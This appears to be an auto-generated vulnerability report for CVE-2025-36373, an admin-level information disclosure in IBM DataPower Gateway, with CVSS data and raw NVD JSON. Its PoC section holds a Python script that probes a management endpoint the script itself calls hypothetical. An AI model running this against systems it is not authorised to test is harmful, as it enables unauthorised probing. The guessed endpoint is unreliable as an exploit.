Security Vulnerability Report
CVE-2025-36373 CVSS 4.1 MEDIUM

Published: 2026-04-01 21:16:58
Last Modified: 2026-04-06 16:50:01

Description

IBM DataPower Gateway 10.6CD 10.6.1.0 through 10.6.5.0, IBM DataPower Gateway 10.5.0 10.5.0.0 through 10.5.0.20, and IBM DataPower Gateway 10.6.0 10.6.0.0 through 10.6.0.8 could disclose sensitive system information from other domains to an administrative user.

CVSS Details

CVSS Score: 4.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:datapower_gateway:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:datapower_gateway:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:datapower_gateway:*:*:*:*:continuous_delivery:*:*:* - VULNERABLE
IBM DataPower Gateway 10.6CD (10.6.1.0 - 10.6.5.0)
IBM DataPower Gateway 10.5.0 (10.5.0.0 - 10.5.0.20)
IBM DataPower Gateway 10.6.0 (10.6.0.0 - 10.6.0.8)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Conceptual Proof of Concept for CVE-2025-36373
# Target: IBM DataPower Gateway
# Precondition: Attacker has High Privilege (Admin) credentials


def check_info_disclosure(target_host, username, password):
    """
    Attempts to access cross-domain status information.
    """
    # Example endpoint that might leak info across domains in vulnerable versions
    # This is a hypothetical endpoint based on the vulnerability description.
    url = f"https://{target_host}/mgmt/status/default"
    headers = {
        "Accept": "application/json",
        "X-Transaction-ID": "poc-test"
    }
    try:
        # Note: verify=False disables TLS certificate validation for this request.
        response = requests.get(url, headers=headers, auth=(username, password),
                                verify=False, timeout=10)
        if response.status_code == 200:
            print("[!] Potential Info Disclosure: Request succeeded.")
            print("[*] Response Data:", response.json())
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[Error] An exception occurred: {e}")


if __name__ == "__main__":
    # Replace with actual target details
    check_info_disclosure("192.168.1.100", "admin", "pass123")

References

https://www.ibm.com/support/pages/node/7267833 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36373", "sourceIdentifier": "[email protected]", "published": "2026-04-01T21:16:57.897", "lastModified": "2026-04-06T16:50:00.793", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM DataPower Gateway 10.6CD 10.6.1.0 through 10.6.5.0 and IBM DataPower Gateway 10.5.0 10.5.0.0 through 10.5.0.20 and IBM DataPower Gateway 10.6.0 10.6.0.0 through 10.6.0.8 IBM DataPower Gateway could disclose sensitive system information from other domains to an administrative user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N", "baseScore": 4.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-497"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:datapower_gateway:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.5.0.0", "versionEndExcluding": "10.5.0.21", "matchCriteriaId": 
"CE32BDC7-B268-4779-A283-F94DCF1433D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:datapower_gateway:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.6.0.0", "versionEndExcluding": "10.6.0.9", "matchCriteriaId": "9036053D-6E1A-4B2F-ACCA-5E3F4443F73E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:datapower_gateway:*:*:*:*:continuous_delivery:*:*:*", "versionStartIncluding": "10.6.1.0", "versionEndExcluding": "10.6.6.0", "matchCriteriaId": "E75118C5-5C01-404E-B857-56B9D6CA2119"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7267833", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}